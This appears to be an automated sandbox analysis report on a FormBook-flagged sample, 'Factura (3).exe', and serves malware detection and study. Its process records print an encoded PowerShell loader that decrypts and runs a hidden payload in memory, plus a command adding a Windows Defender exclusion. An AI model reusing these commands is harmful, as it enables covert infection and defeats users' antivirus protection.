                                                    x-request-id: 34afca40-cbda-4b10-8ede-7decc88c0ae7
                                                    cache-control: no-store, max-age=0
                                                    accept-ch: sec-ch-prefers-color-scheme
                                                    critical-ch: sec-ch-prefers-color-scheme
                                                    vary: sec-ch-prefers-color-scheme
                                                    x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_XqV10ngUDRmZwwc3zAw7Z375kFcYAARhN9c/OVoenMGO1925Rm4FyvQ++dEadD7G2lhBkKn3H4PJkCFPd8JN9A==
                                                    set-cookie: parking_session=34afca40-cbda-4b10-8ede-7decc88c0ae7; expires=Thu, 16 May 2024 15:36:52 GMT; path=/
                                                    connection: close
                                                    Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 58 71 56 31 30 6e 67 55 44 52 6d 5a 77 77 63 33 7a 41 77 37 5a 33 37 35 6b 46 63 59 41 41 52 68 4e 39 63 2f 4f 56 6f 65 6e 4d 47 4f 31 39 32 35 52 6d 34 46 79 76 51 2b 2b 64 45 61 64 44 37 47 32 6c 68 42 6b 4b 6e 33 48 34 50 4a 6b 43 46 50 64 38 4a 4e 39 41 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                    Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_XqV10ngUDRmZwwc3zAw7Z375kFcYAARhN9c/OVoenMGO1925Rm4FyvQ++dEadD7G2lhBkKn3H4PJkCFPd8JN9A==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                    May 16, 2024 17:21:52.390695095 CEST919INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                    Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiMzRhZmNhNDAtY2JkYS00YjEwLThlZGUtN2RlY2M4OGMwYWU3IiwicGFnZV90aW1lIjoxNzE1ODcyOT


                                                    Statistics

                                                    CPU Usage

                                                    Click to jump to process

                                                    Memory Usage

                                                    Click to jump to process

                                                    High Level Behavior Distribution

                                                    Click to dive into process behavior distribution

                                                    Behavior

                                                    Click to jump to process

                                                    System Behavior

                                                    General

                                                    Target ID:6
                                                    Start time:11:18:03
                                                    Start date:16/05/2024
                                                    Path:C:\Users\user\Desktop\Factura (3).exe
                                                    Wow64 process (32bit):false
                                                    Commandline:"C:\Users\user\Desktop\Factura (3).exe"
                                                    Imagebase:0x7ff7340d0000
                                                    File size:1'034'668 bytes
                                                    MD5 hash:367F6A9B9B00F860281FE3865A0D33F0
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:low
                                                    Has exited:true

                                                    General

                                                    Target ID:7
                                                    Start time:11:18:03
                                                    Start date:16/05/2024
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:0x7ff70f010000
                                                    File size:862'208 bytes
                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    General

                                                    Target ID:9
                                                    Start time:11:18:04
                                                    Start date:16/05/2024
                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:powershell.exe -EncodedCommand WwBTAHkAcwB0AGUAbQAuAFQAaAByAGUAYQBkAGkAbgBnAC4AVABoAHIAZQBhAGQAXQA6ADoAUwBsAGUAZQBwACgANQAwADAAMAApAAoACgAkABIEQAQ1BDwENQQ9BD0EMARPBB8EMAQ/BDoEMAQgAD0AIABbAFMAeQBzAHQAZQBtAC4ASQBPAC4AUABhAHQAaABdADoAOgBHAGUAdABUAGUAbQBwAFAAYQB0AGgAKAApAAoAJAAoBDAEMQQ7BD4EPQQgAD0AIAAnAGYAaQBsAGUALQAqAC4AcAB1AHQAaQBrACcACgAkAB8EPgRBBDsENQQ0BD0EOAQ5BCQEMAQ5BDsEIAA9ACAARwBlAHQALQBDAGgAaQBsAGQASQB0AGUAbQAgAC0AUABhAHQAaAAgACQAEgRABDUEPAQ1BD0EPQQwBE8EHwQwBD8EOgQwBCAALQBGAGkAbAB0AGUAcgAgACQAKAQwBDEEOwQ+BD0EIAB8ACAAUwBvAHIAdAAtAE8AYgBqAGUAYwB0ACAATABhAHMAdABXAHIAaQB0AGUAVABpAG0AZQAgAC0ARABlAHMAYwBlAG4AZABpAG4AZwAgAHwAIABTAGUAbABlAGMAdAAtAE8AYgBqAGUAYwB0ACAALQBGAGkAcgBzAHQAIAAxAAoACgBmAHUAbgBjAHQAaQBvAG4AIAAgBDAEQQRIBDgERARABD4EMgQwBEIETAQgAHsACgAgACAAIAAgAHAAYQByAGEAbQAgACgACgAgACAAIAAgACAAIAAgACAAWwBiAHkAdABlAFsAXQBdACQAGgQ7BE4ERwQsAAoAIAAgACAAIAAgACAAIAAgAFsAYgB5AHQAZQBbAF0AXQAkABgEPQQ4BEYEOAQwBDsEOAQ3BDgEQARDBE4ESQQ4BDkEEgQ1BDoEQgQ+BEAELAAKACAAIAAgACAAIAAgACAAIABbAGIAeQB0AGUAWwBdAF0AJAAUBDAEPQQ9BEsENQQKACAAIAAgACAAKQAKAAoAIAAgACAAIAAkACgEOAREBEAEMARCBD4EQAQgAD0AIABbAFMAeQBzAHQAZQBtAC4AUwBlAGMAdQByAGkAdAB5AC4AQwByAHkAcAB0AG8AZwByAGEAcABoAHkALgBBAGUAcwBdADoAOgBDAHIAZQBhAHQAZQAoACkACgAgACAAIAAgACQAKAQ4BEQEQAQwBEIEPgRABC4ATQBvAGQAZQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AUwBlAGMAdQByAGkAdAB5AC4AQwByAHkAcAB0AG8AZwByAGEAcABoAHkALgBDAGkAcABoAGUAcgBNAG8AZABlAF0AOgA6AEMAQgBDAAoAIAAgACAAIAAkACgEOAREBEAEMARCBD4EQAQuAFAAYQBkAGQAaQBuAGcAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFMAZQBjAHUAcgBpAHQAeQAuAEMAcgB5AHAAdABvAGcAcgBhAHAAaAB5AC4AUABhAGQAZABpAG4AZwBNAG8AZABlAF0AOgA6AFAASwBDAFMANwAKAAoAIAAgACAAIAAkACAEMARBBEgEOAREBEAEPgQyBEkEOAQ6BCAAPQAgACQAKAQ4BEQEQAQwBEIEPgRABC4AQwByAGUAYQB0AGUARABlAGMAcgB5AHAAdABvAHIAKAAkABoEOwROBEcELAAgACQAGAQ9BDgERgQ4BDAEOwQ4BDcEOARABEMETgRJBDgEOQQSBDUEOgRCBD4EQAQpAAoAIAAgACAAIAAkACAEMARBBEgEOAREBEAEPgQyBDAEPQQ9BEsENQQUBDAEPQQ9BEsENQQgAD0AIAAkACAEMARBBEgEOAREBEAEPgQyBEkEOAQ6BC4AVAByAGEAbgBzAGYAbwByAG0ARgBpAG4AYQBsAEIAbABvAGMAawAoACQAFAQwBD0EPQRLBDUELAAgADAALAAgACQAFAQwBD0EPQRLBDUELgBMAGUAbgBnAHQAaAApAAoACQAKACAAIAAgACAAcgBlAHQAdQByAG4AIAAkACAEMARBBEgEOAREBEAEPgQyBDAEPQQ9BEsENQQUBDAEPQQ9BEsENQQKAH0ACgAKACQAGgQ7BE4ERwQgAD0AIABbAGIAeQB0AGUAWwBdAF0AQAAoADAAeAA1ADAALAAgADAAeABCADAALAAgADAAeAA1AEIALAAgADAAeAAzAEQALAAgADAAeAA3ADEALAAgADAAeAA4ADAALAAgADAAeABBADcALAAgADAAeABEAEMALAAgADAAeABBADgALAAgADAAeAA1AEMALAAgADAAeAAyADYALAAgADAAeAA5AEEALAAgADAAeAA3AEIALAAgADAAeAA5ADIALAAgADAAeABEAEQALAAgADAAeABFADcALAAgADAAeAA3ADYALAAgADAAeABEADAALAAgADAAeABDAEYALAAgADAAeAA0ADIALAAgADAAeAA5ADAALAAgADAAeABCAEIALAAgADAAeAA2AEYALAAgADAAeAA1AEYALAAgADAAeABDADQALAAgADAAeABCADgALAAgADAAeAAxAEQALAAgADAAeABBADYALAAgADAAeABCAEUALAAgADAAeABFADQALAAgADAAeAA2AEMALAAgADAAeAAzADUAKQAKACQAGAQ9BDgERgQ4BDAEOwQ4BDcEOARABEMETgRJBDgEOQQSBDUEOgRCBD4EQAQgAD0AIABbAGIAeQB0AGUAWwBdAF0AQAAoADAAeABFADcALAAgADAAeAA5ADkALAAgADAAeAAyADEALAAgADAAeAAyADcALAAgADAAeAA1AEEALAAgADAAeAAyAEQALAAgADAAeAAzADEALAAgADAAeAA1ADMALAAgADAAeAAwAEUALAAgADAAeABCAEIALAAgADAAeABFADQALAAgADAAeABFAEUALAAgADAAeAAyAEIALAAgADAAeAA5ADQALAAgADAAeABFADMALAAgADAAeAAwAEMAKQAKAAoAaQBmACAAKAAkAB8EPgRBBDsENQQ0BD0EOAQ5BCQEMAQ5BDsEIAAtAG4AZQAgACQAbgB1AGwAbAApACAAewAKACAAIAAgACAAJAAfBEMEQgRMBCQEMAQ5BDsEMAQgAD0AIAAkAB8EPgRBBDsENQQ0BD0EOAQ5BCQEMAQ5BDsELgBGAHUAbABsAE4AYQBtAGUACgAgACAAIAAgACQAFwQwBEgEOAREBEAEPgQyBDAEPQQ9BEsENQQRBDAEOQRCBEsEIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAB8EQwRCBEwEJAQwBDkEOwQwBCkAOwAKACAAIAAgACAAJAAgBDAEQQRIBDgERARABD4EMgQwBD0EPQQ+BDUEIQQ+BDQENQRABDYEOAQ8BD4ENQQgAD0AIAAgBDAEQQRIBDgERARABD4EMgQwBEIETAQgAC0AGgQ7BE4ERwQgACQAGgQ7BE4ERwQgAC0AGAQ9BDgERgQ4BDAEOwQ4BDcEOARABEMETgRJBDgEOQQSBDUEOgRCBD4EQAQgACQAGAQ9BDgERgQ4BDAEOwQ4BDcEOARABEMETgRJBDgEOQQSBDUEOgRCBD4EQAQgAC0AFAQwBD0EPQRLBDUEIAAkABcEMARIBDgERARABD4EMgQwBD0EPQRLBDUEEQQwBDkEQgRLBAoACgAgACAAIAAgACQAIQQxBD4EQAQ6BDAEIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoAFsAYgB5AHQAZQBbAF0AXQBAACgAJAAgBDAEQQRIBDgERARABD4EMgQwBD0EPQQ+BDUEIQQ+BDQENQRABDYEOAQ8BD4ENQQpACkAOwAKACAAIAAgACAAJAAiBD4ERwQ6BDAEEgRFBD4ENAQwBCAAPQAgACQAIQQxBD4EQAQ6BDAELgBFAG4AdAByAHkAUABvAGkAbgB0ADsACgAgACAAIAAgACQAIgQ+BEcEOgQwBBIERQQ+BDQEMAQuAEkAbgB2AG8AawBlACgAJABuAHUAbABsACwAIAAkAG4AdQBsAGwAKQA7AAoAfQAKAA==
                                                    Imagebase:0x7ff760310000
                                                    File size:452'608 bytes
                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000009.00000002.1563610198.000001CE12DAC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000009.00000002.1563610198.000001CE1209D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                    Reputation:high
                                                    Has exited:true

                                                    General

                                                    Target ID:10
                                                    Start time:11:18:04
                                                    Start date:16/05/2024
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:0x7ff70f010000
                                                    File size:862'208 bytes
                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    General

                                                    Target ID:11
                                                    Start time:11:18:17
                                                    Start date:16/05/2024
                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Factura (3).exe" -Force
                                                    Imagebase:0x7ff760310000
                                                    File size:452'608 bytes
                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    General

                                                    Target ID:12
                                                    Start time:11:18:17
                                                    Start date:16/05/2024
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:0x7ff70f010000
                                                    File size:862'208 bytes
                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    General

                                                    Target ID:13
                                                    Start time:11:18:17
                                                    Start date:16/05/2024
                                                    Path:C:\Windows\System32\calc.exe
                                                    Wow64 process (32bit):
                                                    Commandline:"C:\Windows\System32\calc.exe"
                                                    Imagebase:
                                                    File size:27'648 bytes
                                                    MD5 hash:5DA8C98136D98DFEC4716EDD79C7145F
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:moderate
                                                    Has exited:false

                                                    General

                                                    Target ID:14
                                                    Start time:11:18:17
                                                    Start date:16/05/2024
                                                    Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"
                                                    Imagebase:0x960000
                                                    File size:2'141'552 bytes
                                                    MD5 hash:EB80BB1CA9B9C7F516FF69AFCFD75B7D
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000E.00000002.1567061985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000E.00000002.1567061985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000E.00000002.1567476017.0000000004EA0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000E.00000002.1567476017.0000000004EA0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000E.00000002.1574530292.0000000007EC0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000E.00000002.1574530292.0000000007EC0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                    Reputation:moderate
                                                    Has exited:true

                                                    General

                                                    Target ID:17
                                                    Start time:11:18:18
                                                    Start date:16/05/2024
                                                    Path:C:\Windows\System32\WerFault.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\WerFault.exe -u -p 7492 -s 2236
                                                    Imagebase:0x7ff63b820000
                                                    File size:570'736 bytes
                                                    MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    General

                                                    Target ID:20
                                                    Start time:11:18:24
                                                    Start date:16/05/2024
                                                    Path:C:\Program Files (x86)\pIMpitAZqKZfeRCOXcQATdJpZunqtwcykqYxFSHiFpLgkyjNuFL\KAnMKAQhHABqpRuDRpLtww.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Program Files (x86)\pIMpitAZqKZfeRCOXcQATdJpZunqtwcykqYxFSHiFpLgkyjNuFL\KAnMKAQhHABqpRuDRpLtww.exe"
                                                    Imagebase:0x970000
                                                    File size:140'800 bytes
                                                    MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000014.00000002.3765581887.00000000059F0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000014.00000002.3765581887.00000000059F0000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                    Reputation:high
                                                    Has exited:false

                                                    General

                                                    Target ID:23
                                                    Start time:11:18:25
                                                    Start date:16/05/2024
                                                    Path:C:\Windows\SysWOW64\chkdsk.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Windows\SysWOW64\chkdsk.exe"
                                                    Imagebase:0x890000
                                                    File size:23'040 bytes
                                                    MD5 hash:B4016BEE9D8F3AD3D02DD21C3CAFB922
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000017.00000002.3762446362.0000000000750000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000017.00000002.3762446362.0000000000750000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000017.00000002.3763198467.0000000004C60000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000017.00000002.3763198467.0000000004C60000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000017.00000002.3763434495.0000000004CA0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000017.00000002.3763434495.0000000004CA0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                    Reputation:moderate
                                                    Has exited:false

                                                    General

                                                    Target ID:24
                                                    Start time:11:18:39
                                                    Start date:16/05/2024
                                                    Path:C:\Program Files (x86)\pIMpitAZqKZfeRCOXcQATdJpZunqtwcykqYxFSHiFpLgkyjNuFL\KAnMKAQhHABqpRuDRpLtww.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Program Files (x86)\pIMpitAZqKZfeRCOXcQATdJpZunqtwcykqYxFSHiFpLgkyjNuFL\KAnMKAQhHABqpRuDRpLtww.exe"
                                                    Imagebase:0x970000
                                                    File size:140'800 bytes
                                                    MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000018.00000002.3767966509.0000000005690000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000018.00000002.3767966509.0000000005690000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                    Reputation:high
                                                    Has exited:false

                                                    General

                                                    Target ID:25
                                                    Start time:11:18:50
                                                    Start date:16/05/2024
                                                    Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                    Imagebase:0x7ff73feb0000
                                                    File size:676'768 bytes
                                                    MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    Disassembly

                                                    Reset < >

                                                      Execution Graph

                                                      Execution Coverage:8.8%
                                                      Dynamic/Decrypted Code Coverage:0%
                                                      Signature Coverage:1.2%
                                                      Total number of Nodes:1438
                                                      Total number of Limit Nodes:36
                                                      execution_graph 21792 7ff7340f5a34 21795 7ff7340f5800 21792->21795 21802 7ff7340f276c EnterCriticalSection 21795->21802 20239 7ff7340e5130 20240 7ff7340e5152 20239->20240 20241 7ff7340dfa70 Concurrency::details::UMSSchedulerProxy::~UMSSchedulerProxy 78 API calls 20240->20241 20246 7ff7340e51e4 fpos Concurrency::details::UMSSchedulerProxy::~UMSSchedulerProxy 20240->20246 20242 7ff7340e5199 20241->20242 20243 7ff7340e51ca 20242->20243 20242->20246 20247 7ff7340ef524 20242->20247 20243->20246 20255 7ff7340eed08 20243->20255 20248 7ff7340ef554 20247->20248 20249 7ff7340ef2b4 75 API calls 20248->20249 20250 7ff7340ef56d 20249->20250 20251 7ff7340ef592 20250->20251 20253 7ff7340edf90 _vswprintf_s_l 47 API calls 20250->20253 20252 7ff7340ef5a7 20251->20252 20254 7ff7340edf90 _vswprintf_s_l 47 API calls 20251->20254 20252->20243 20253->20251 20254->20252 20256 7ff7340eed31 20255->20256 20257 7ff7340eed1c 20255->20257 20256->20257 20259 7ff7340eed36 20256->20259 20258 7ff7340f3518 memcpy_s 11 API calls 20257->20258 20260 7ff7340eed21 20258->20260 20264 7ff7340fa740 20259->20264 20262 7ff7340ee37c _invalid_parameter_noinfo 47 API calls 20260->20262 20263 7ff7340eed2c 20262->20263 20263->20246 20265 7ff7340fa770 20264->20265 20272 7ff7340fa24c 20265->20272 20268 7ff7340fa7af 20270 7ff7340fa7c4 20268->20270 20271 7ff7340edf90 _vswprintf_s_l 47 API calls 20268->20271 20269 7ff7340edf90 _vswprintf_s_l 47 API calls 20269->20268 20270->20263 20271->20270 20273 7ff7340fa296 20272->20273 20274 7ff7340fa267 20272->20274 20282 7ff7340ee5ec EnterCriticalSection 20273->20282 20276 7ff7340ee2b0 _vswprintf_s_l 47 API calls 20274->20276 20277 7ff7340fa287 20276->20277 20277->20268 20277->20269 22455 7ff7340e5720 22456 7ff7340e574b Concurrency::details::UMSSchedulerProxy::~UMSSchedulerProxy 22455->22456 22457 7ff7340e57cb 22456->22457 22461 7ff7340e5779 Concurrency::details::UMSSchedulerProxy::~UMSSchedulerProxy 22456->22461 22467 7ff7340e580d Concurrency::details::WorkQueue::IsStructuredEmpty codecvt 22456->22467 22477 7ff7340db240 22457->22477 22459 7ff7340e7a40 std::_Locinfo::_Getcvt 8 API calls 22460 7ff7340e5a78 22459->22460 22461->22459 22463 7ff7340e583a Concurrency::details::UMSSchedulerProxy::~UMSSchedulerProxy 22465 7ff7340de4e0 Concurrency::details::ResourceManager::CreateNodeTopology 47 API calls 22463->22465 22465->22461 22466 7ff7340e5925 22468 7ff7340e5a12 22466->22468 22470 7ff7340e5930 Concurrency::details::UMSSchedulerProxy::~UMSSchedulerProxy 22466->22470 22467->22463 22467->22466 22474 7ff7340e5948 Concurrency::details::WorkQueue::IsStructuredEmpty 22467->22474 22480 7ff7340eebf4 22467->22480 22501 7ff7340e4e50 22467->22501 22517 7ff7340e3e10 22467->22517 22471 7ff7340de4e0 Concurrency::details::ResourceManager::CreateNodeTopology 47 API calls 22468->22471 22472 7ff7340de4e0 Concurrency::details::ResourceManager::CreateNodeTopology 47 API calls 22470->22472 22471->22461 22472->22461 22473 7ff7340e59c2 22476 7ff7340de4e0 Concurrency::details::ResourceManager::CreateNodeTopology 47 API calls 22473->22476 22474->22473 22505 7ff7340efdec 22474->22505 22476->22461 22478 7ff7340eebf4 _Fgetc 64 API calls 22477->22478 22479 7ff7340db258 22478->22479 22479->22461 22481 7ff7340eec10 22480->22481 22482 7ff7340eec2e 22480->22482 22483 7ff7340f3518 memcpy_s 11 API calls 22481->22483 22520 7ff7340ee5ec EnterCriticalSection 22482->22520 22485 7ff7340eec15 22483->22485 22487 7ff7340ee37c _invalid_parameter_noinfo 47 API calls 22485->22487 22497 7ff7340eec20 22487->22497 22497->22467 22502 7ff7340e4edf 22501->22502 22504 7ff7340e4e7c Concurrency::details::WorkQueue::IsStructuredEmpty char_traits 22501->22504 22521 7ff7340dbd70 22502->22521 22504->22467 22506 7ff7340efe05 22505->22506 22507 7ff7340efe23 22505->22507 22509 7ff7340f3518 memcpy_s 11 API calls 22506->22509 22529 7ff7340ee5ec EnterCriticalSection 22507->22529 22511 7ff7340efe0a 22509->22511 22512 7ff7340ee37c _invalid_parameter_noinfo 47 API calls 22511->22512 22514 7ff7340efe15 22512->22514 22514->22474 22518 7ff7340df990 49 API calls 22517->22518 22519 7ff7340e3e35 22518->22519 22519->22467 22522 7ff7340dbdb3 _Mpunct 22521->22522 22523 7ff7340e1bf0 _Mpunct 49 API calls 22522->22523 22524 7ff7340dbdc7 Concurrency::details::WorkQueue::IsStructuredEmpty _Mpunct 22522->22524 22523->22524 22525 7ff7340dac20 _Mpunct 49 API calls 22524->22525 22526 7ff7340dbe25 Concurrency::details::WorkQueue::IsStructuredEmpty 22525->22526 22527 7ff7340dbeb8 _Mpunct 22526->22527 22528 7ff7340dfa00 Concurrency::details::ResourceManager::CreateNodeTopology 47 API calls 22526->22528 22527->22504 22528->22527 21020 7ff7340ee548 21021 7ff7340ee553 21020->21021 21029 7ff7340f8b64 21021->21029 21042 7ff7340f276c EnterCriticalSection 21029->21042 22602 7ff7340e1340 22603 7ff7340e1358 22602->22603 22604 7ff7340e1369 22602->22604 22606 7ff7340ee5ec EnterCriticalSection 22603->22606 22607 7ff7340e5340 22609 7ff7340e535b 22607->22609 22608 7ff7340e53b2 22609->22608 22613 7ff7340efb94 22609->22613 22612 7ff7340e06f0 Concurrency::details::UMSSchedulerProxy::~UMSSchedulerProxy 47 API calls 22612->22608 22616 7ff7340efbc2 22613->22616 22614 7ff7340efbe7 22615 7ff7340ee2b0 _vswprintf_s_l 47 API calls 22614->22615 22619 7ff7340efc10 22615->22619 22616->22614 22617 7ff7340efc3a 22616->22617 22624 7ff7340efa6c 22617->22624 22620 7ff7340edf90 _vswprintf_s_l 47 API calls 22619->22620 22622 7ff7340efca4 22619->22622 22620->22622 22621 7ff7340e53ae 22621->22608 22621->22612 22622->22621 22623 7ff7340edf90 _vswprintf_s_l 47 API calls 22622->22623 22623->22621 22631 7ff7340ee5ec EnterCriticalSection 22624->22631 18568 7ff7340e7b70 18591 7ff7340e76d0 18568->18591 18571 7ff7340e7b91 __scrt_acquire_startup_lock 18574 7ff7340e7cd1 18571->18574 18575 7ff7340e7baf 18571->18575 18572 7ff7340e7cc7 18719 7ff7340e7ef4 IsProcessorFeaturePresent 18572->18719 18576 7ff7340e7ef4 7 API calls 18574->18576 18582 7ff7340e7bd0 __scrt_release_startup_lock 18575->18582 18599 7ff7340f54f0 18575->18599 18579 7ff7340e7cdc 